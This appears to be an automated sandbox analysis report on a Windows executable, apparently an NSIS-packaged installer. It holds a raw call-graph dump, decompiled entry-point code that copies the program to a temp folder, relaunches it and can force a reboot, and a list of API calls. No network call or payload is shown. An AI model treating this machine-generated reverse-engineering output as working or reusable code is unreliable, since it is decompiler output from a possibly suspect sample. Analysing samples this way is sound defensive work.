4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 
4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 
40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 
4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 
406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 
4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 
4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 
4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 
4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                    Control-flow Graph

                    [Control-flow graph for the code starting at 403640; nodes are marked Executed or Not Executed]
                    C-Code - Quality: 78%
                    			_entry_() {
                    				WCHAR* _v8;
                    				signed int _v12;
                    				void* _v16;
                    				signed int _v20;
                    				int _v24;
                    				int _v28;
                    				struct _TOKEN_PRIVILEGES _v40;
                    				signed char _v42;
                    				int _v44;
                    				signed int _v48;
                    				intOrPtr _v278;
                    				signed short _v310;
                    				struct _OSVERSIONINFOW _v324;
                    				struct _SHFILEINFOW _v1016;
                    				intOrPtr* _t88;
                    				intOrPtr* _t94;
                    				void _t97;
                    				void* _t116;
                    				WCHAR* _t118;
                    				signed int _t119;
                    				intOrPtr* _t123;
                    				void* _t137;
                    				void* _t143;
                    				void* _t148;
                    				void* _t152;
                    				void* _t157;
                    				signed int _t167;
                    				void* _t170;
                    				void* _t175;
                    				intOrPtr _t177;
                    				intOrPtr _t178;
                    				intOrPtr* _t179;
                    				int _t188;
                    				void* _t189;
                    				void* _t198;
                    				signed int _t204;
                    				signed int _t209;
                    				signed int _t214;
                    				int* _t218;
                    				signed int _t226;
                    				signed int _t229;
                    				CHAR* _t231;
                    				signed int _t233;
                    				WCHAR* _t234;
                    
                    				0x435000 = 0x20;
                    				_t188 = 0;
                    				_v24 = 0;
                    				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                    				_v20 = 0;
                    				SetErrorMode(0x8001); // executed
                    				_v324.szCSDVersion = 0;
                    				_v48 = 0;
                    				_v44 = 0;
                    				_v324.dwOSVersionInfoSize = 0x11c;
                    				if(GetVersionExW( &_v324) == 0) {
                    					_v324.dwOSVersionInfoSize = 0x114;
                    					GetVersionExW( &_v324);
                    					asm("sbb eax, eax");
                    					_v42 = 4;
                    					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                    				}
                    				if(_v324.dwMajorVersion < 0xa) {
                    					_v310 = _v310 & 0x00000000;
                    				}
                    				 *0x42a318 = _v324.dwBuildNumber;
                    				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                    				if( *0x42a31e != 0x600) {
                    					_t179 = E00406A35(_t188);
                    					if(_t179 != _t188) {
                    						 *_t179(0xc00);
                    					}
                    				}
                    				_t231 = "UXTHEME";
                    				do {
                    					E004069C5(_t231); // executed
                    					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                    				} while ( *_t231 != 0);
                    				E00406A35(0xb);
                    				 *0x42a264 = E00406A35(9);
                    				_t88 = E00406A35(7);
                    				if(_t88 != _t188) {
                    					_t88 =  *_t88(0x1e);
                    					if(_t88 != 0) {
                    						 *0x42a31c =  *0x42a31c | 0x00000080;
                    					}
                    				}
                    				__imp__#17();
                    				__imp__OleInitialize(_t188); // executed
                    				 *0x42a320 = _t88;
                    				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
                    				E00406668(0x429260, L"NSIS Error");
                    				E00406668(0x435000, GetCommandLineW());
                    				_t94 = 0x435000;
                    				_t233 = 0x22;
                    				 *0x42a260 = 0x400000;
                    				if( *0x435000 == _t233) {
                    					_t94 = 0x435002;
                    				}
                    				_t198 = CharNextW(E00405F64(_t94, 0x435000));
                    				_v16 = _t198;
                    				while(1) {
                    					_t97 =  *_t198;
                    					_t251 = _t97 - _t188;
                    					if(_t97 == _t188) {
                    						break;
                    					}
                    					_t209 = 0x20;
                    					__eflags = _t97 - _t209;
                    					if(_t97 != _t209) {
                    						L17:
                    						__eflags =  *_t198 - _t233;
                    						_v12 = _t209;
                    						if( *_t198 == _t233) {
                    							_v12 = _t233;
                    							_t198 = _t198 + 2;
                    							__eflags = _t198;
                    						}
                    						__eflags =  *_t198 - 0x2f;
                    						if( *_t198 != 0x2f) {
                    							L32:
                    							_t198 = E00405F64(_t198, _v12);
                    							__eflags =  *_t198 - _t233;
                    							if(__eflags == 0) {
                    								_t198 = _t198 + 2;
                    								__eflags = _t198;
                    							}
                    							continue;
                    						} else {
                    							_t198 = _t198 + 2;
                    							__eflags =  *_t198 - 0x53;
                    							if( *_t198 != 0x53) {
                    								L24:
                    								asm("cdq");
                    								asm("cdq");
                    								_t214 = L"NCRC" & 0x0000ffff;
                    								asm("cdq");
                    								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
                    								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
                    								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
                    									L29:
                    									asm("cdq");
                    									asm("cdq");
                    									_t209 = L" /D=" & 0x0000ffff;
                    									asm("cdq");
                    									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
                    									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
                    									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
                    										L31:
                    										_t233 = 0x22;
                    										goto L32;
                    									}
                    									__eflags =  *_t198 - _t229;
                    									if( *_t198 == _t229) {
                    										 *(_t198 - 4) = _t188;
                    										__eflags = _t198;
                    										E00406668(0x435800, _t198);
                    										L37:
                    										_t234 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
                    										GetTempPathW(0x400, _t234);
                    										_t116 = E0040360F(_t198, _t251);
                    										_t252 = _t116;
                    										if(_t116 != 0) {
                    											L40:
                    											DeleteFileW(L"1033"); // executed
                    											_t118 = E004030D0(_t254, _v20); // executed
                    											_v8 = _t118;
                    											if(_t118 != _t188) {
                    												L68:
                    												ExitProcess(); // executed
                    												__imp__OleUninitialize(); // executed
                    												if(_v8 == _t188) {
                    													if( *0x42a2f4 == _t188) {
                    														L77:
                    														_t119 =  *0x42a30c;
                    														if(_t119 != 0xffffffff) {
                    															_v24 = _t119;
                    														}
                    														ExitProcess(_v24);
                    													}
                    													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                    														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                    														_v40.PrivilegeCount = 1;
                    														_v28 = 2;
                    														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                    													}
                    													_t123 = E00406A35(4);
                    													if(_t123 == _t188) {
                    														L75:
                    														if(ExitWindowsEx(2, 0x80040002) != 0) {
                    															goto L77;
                    														}
                    														goto L76;
                    													} else {
                    														_push(0x80040002);
                    														_push(0x25);
                    														_push(_t188);
                    														_push(_t188);
                    														_push(_t188);
                    														if( *_t123() == 0) {
                    															L76:
                    															E0040140B(9);
                    															goto L77;
                    														}
                    														goto L75;
                    													}
                    												}
                    												E00405CC8(_v8, 0x200010);
                    												ExitProcess(2);
                    											}
                    											if( *0x42a27c == _t188) {
                    												L51:
                    												 *0x42a30c =  *0x42a30c | 0xffffffff;
                    												_v24 = E00403D17(_t264);
                    												goto L68;
                    											}
                    											_t218 = E00405F64(0x435000, _t188);
                    											if(_t218 < 0x435000) {
                    												L48:
                    												_t263 = _t218 - 0x435000;
                    												_v8 = L"Error launching installer";
                    												if(_t218 < 0x435000) {
                    													_t189 = E00405C33(__eflags);
                    													lstrcatW(_t234, L"~nsu");
                    													__eflags = _t189;
                    													if(_t189 != 0) {
                    														lstrcatW(_t234, "A");
                    													}
                    													lstrcatW(_t234, L".tmp");
                    													_t137 = lstrcmpiW(_t234, 0x436800);
                    													__eflags = _t137;
                    													if(_t137 == 0) {
                    														L67:
                    														_t188 = 0;
                    														__eflags = 0;
                    														goto L68;
                    													} else {
                    														__eflags = _t189;
                    														_push(_t234);
                    														if(_t189 == 0) {
                    															E00405C16();
                    														} else {
                    															E00405B99();
                    														}
                    														SetCurrentDirectoryW(_t234);
                    														__eflags =  *0x435800;
                    														if( *0x435800 == 0) {
                    															E00406668(0x435800, 0x436800);
                    														}
                    														E00406668(0x42b000, _v16);
                    														_t201 = "A" & 0x0000ffff;
                    														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                    														__eflags = _t143;
                    														_v12 = 0x1a;
                    														 *0x42b800 = _t143;
                    														do {
                    															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                    															DeleteFileW(0x420f08);
                    															__eflags = _v8;
                    															if(_v8 != 0) {
                    																_t148 = CopyFileW(L"C:\\Users\\jones\\Desktop\\PhviZrlpkW.exe", 0x420f08, 1);
                    																__eflags = _t148;
                    																if(_t148 != 0) {
                    																	E00406428(_t201, 0x420f08, 0);
                    																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                    																	_t152 = E00405C4B(0x420f08);
                    																	__eflags = _t152;
                    																	if(_t152 != 0) {
                    																		CloseHandle(_t152);
                    																		_v8 = 0;
                    																	}
                    																}
                    															}
                    															 *0x42b800 =  *0x42b800 + 1;
                    															_t61 =  &_v12;
                    															 *_t61 = _v12 - 1;
                    															__eflags =  *_t61;
                    														} while ( *_t61 != 0);
                    														E00406428(_t201, _t234, 0);
                    														goto L67;
                    													}
                    												}
                    												 *_t218 = _t188;
                    												_t221 =  &(_t218[2]);
                    												_t157 = E0040603F(_t263,  &(_t218[2]));
                    												_t264 = _t157;
                    												if(_t157 == 0) {
                    													goto L68;
                    												}
                    												E00406668(0x435800, _t221);
                    												E00406668(0x436000, _t221);
                    												_v8 = _t188;
                    												goto L51;
                    											}
                    											asm("cdq");
                    											asm("cdq");
                    											asm("cdq");
                    											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                    											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                    											while( *_t218 != _t204 || _t218[1] != _t167) {
                    												_t218 = _t218;
                    												if(_t218 >= 0x435000) {
                    													continue;
                    												}
                    												break;
                    											}
                    											_t188 = 0;
                    											goto L48;
                    										}
                    										GetWindowsDirectoryW(_t234, 0x3fb);
                    										lstrcatW(_t234, L"\\Temp");
                    										_t170 = E0040360F(_t198, _t252);
                    										_t253 = _t170;
                    										if(_t170 != 0) {
                    											goto L40;
                    										}
                    										GetTempPathW(0x3fc, _t234);
                    										lstrcatW(_t234, L"Low");
                    										SetEnvironmentVariableW(L"TEMP", _t234);
                    										SetEnvironmentVariableW(L"TMP", _t234);
                    										_t175 = E0040360F(_t198, _t253);
                    										_t254 = _t175;
                    										if(_t175 == 0) {
                    											goto L68;
                    										}
                    										goto L40;
                    									}
                    									goto L31;
                    								}
                    								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                    								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                    									goto L29;
                    								}
                    								_t177 =  *((intOrPtr*)(_t198 + 8));
                    								__eflags = _t177 - 0x20;
                    								if(_t177 == 0x20) {
                    									L28:
                    									_t36 =  &_v20;
                    									 *_t36 = _v20 | 0x00000004;
                    									__eflags =  *_t36;
                    									goto L29;
                    								}
                    								__eflags = _t177 - _t188;
                    								if(_t177 != _t188) {
                    									goto L29;
                    								}
                    								goto L28;
                    							}
                    							_t178 =  *((intOrPtr*)(_t198 + 2));
                    							__eflags = _t178 - _t209;
                    							if(_t178 == _t209) {
                    								L23:
                    								 *0x42a300 = 1;
                    								goto L24;
                    							}
                    							__eflags = _t178 - _t188;
                    							if(_t178 != _t188) {
                    								goto L24;
                    							}
                    							goto L23;
                    						}
                    					} else {
                    						goto L16;
                    					}
                    					do {
                    						L16:
                    						_t198 = _t198 + 2;
                    						__eflags =  *_t198 - _t209;
                    					} while ( *_t198 == _t209);
                    					goto L17;
                    				}
                    				goto L37;
                    			}

                    APIs
                    • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                    • GetVersionExW.KERNEL32(?), ref: 0040368C
                    • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                    • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                    • OleInitialize.OLE32(00000000), ref: 0040377D
                    • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                    • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                    • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000), ref: 004037E9
                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
